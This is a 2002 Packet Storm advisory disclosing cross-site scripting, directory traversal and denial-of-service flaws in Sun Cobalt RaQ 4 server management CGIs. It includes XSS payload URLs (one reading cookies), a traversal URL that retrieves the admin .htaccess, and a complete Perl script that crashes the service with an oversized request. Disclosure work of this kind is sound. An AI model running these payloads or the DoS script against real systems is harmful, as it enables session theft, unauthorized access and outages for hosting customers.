Colbalt-RAQ-v4.txt

2002-03-04T00:00:00
ID PACKETSTORM:25837
Type packetstorm
Reporter Alex Hernandez
Modified 2002-03-04T00:00:00

Description

                                        
                                            `  
------oOo----------------  
Cobalt RAQ 4 Server Management,  
Cross Site Scripting , Directory Traversal & DoS Vulnerabilities.  
------oOo----------------  
  
  
Company Affected: www.cobalt.com & www.sun.com  
Version: RAQ 4 Server Management.  
Dowload: http://www.cobalt.com/products/raq/index.html  
OS Affected: Linux ALL, Solaris ALL.  
  
  
Author:  
  
** Alex Hernandez <al3xhernandez@ureach.com>  
** Thanks all the people from Spain and Argentina.  
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.  
  
  
----=[Brief Description]=------------  
  
The Sun Cobalt RaQ is a server appliance for Internet Service Providers  
(ISPs).   
It can host up to 200 individual websites or it can be dedicated to a  
single medium or large customer. This versatility opens up tremendous   
opportunity for service provider to invest in a single piece of hardware   
while migrating business customers up to dedicated servers.  
  
  
----=[Summary]=----------------------  
  
  
Exist three vulnerabilities:  
  
a) Cross Site Scripting.  
b) Traversal vulnerabilities.  
c) Denial Of Service.(Exploit Released)  
  
  
Cobalt's service.cgi incorrectly handles the incoming search parses,  
incoming HTML tags or JavaScript will be included inside the result without   
them being filtered out for dangerous content. A similar problem occurs with   
the x.cgi's inclusion of malicious code inside the resulting title search.  
  
The cgi^s files is an open source .A security vulnerability in the  
product allows attackers to insert malicious content into existing web pages by  
exploiting the Cross-Site Scripting Vulnerability.  
  
  
Affected Files Cgi^s  
  
alert.cgi   
service.cgi  
  
  
Workaround:  
1) Delete service.cgi from the system, or disable its possible  
execution.  
2) Delete alert.cgi from the system, or disable its possible execution  
  
  
EXAMPLES:  
  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('hello')</script>  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Microsoft%20hole')</script>  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(document.cookie)</script>  
  
LOCATION:  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.location)%3C/script%3E  
  
COOKIES:  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
TAG IMAGES:  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>  
  
  
WRITE ON DOCUMENT:  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<SCRIPT>document.write(document.domain)</SCRIPT>  
  
  
------oOo--------  
  
Traversal File configuration.  
  
  
Exploit:  
http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess  
  
# Access file for /usr/admserv/html/.cobalt/admin/ (admin )  
order allow,deny  
allow from all  
require user admin  
Authname CobaltRaQ  
Authtype Basic  
  
  
  
Directory by Default on server is: "/usr/admserv/html/.cobalt/admin" u  
can translate to any directory for capture restricted files or passwords   
and profiles the users.  
  
  
------oOo--------  
  
Denial Of service.   
  
  
Proof Of concept:  
  
Server crashes after sending a very long URL:  
  
Example:  
  
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...(Ax100000)...AAA  
  
  
Crash system and the admin need restart the service!.  
  
  
------oOo-------------  
Exploit Code DoS Cobalt4_DoS.pl  
------oOo-------------  
  
  
#!/usr/bin/perl  
#  
# Simple script to send a long 'A^s' command to the server,   
# resulting in the server crashing.  
#  
# Cobalt RAQ DoS v4 proof-of-concept exploit.  
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.  
#  
# Thanks all the people from Spain and Argentina.  
# Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.  
#   
#  
# Usage: perl -x Cobalt4_DoS.pl -s <server>  
#  
# Example:   
#  
# perl -x Cobalt4_DoS.pl -s 10.0.0.1  
#   
# Crash was successful !  
#  
  
use Getopt::Std;  
use IO::Socket;  
  
print("\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\n");  
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");  
  
getopts('s:', \%args);  
if(!defined($args{s})){&usage;}  
  
($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);  
  
$def = "A";  
$num = "100000";  
$data .= $def x $num;  
$serv = $args{s};  
$port = 81;#maybe u define the port for diference of versions  
$buf = "GET /cgi-bin/.cobalt/alert/service.cgi?service=$data  
/HTTP/1.0\r\n\r\n";  
  
  
$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");  
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");  
$proto = getprotobyname('tcp') || die("Error: $!\n");  
  
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");  
connect(S, $paddr) ||die ("Error: $!");  
select(S); $| = 1; select(STDOUT);  
print S "$buf";  
  
  
print("\nCrash was successful !\n\n");  
  
sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}  
  
  
  
------oOo------------------------------------  
Vendor Response:  
The vendor was notified  
  
Posted List^s Security cobalt:  
cobalt-security@list.cobalt.com &  
jlovell@sun.com  
  
http://www.cobalt.com  
Patch Temporary:   
Delete files cgi^s from the system, or disable its   
possible execution.  
  
Alex Hernandez <al3xhernandez@ureach.com> (c) 2002.  
  
------oOo------------------------------------  
  
  
`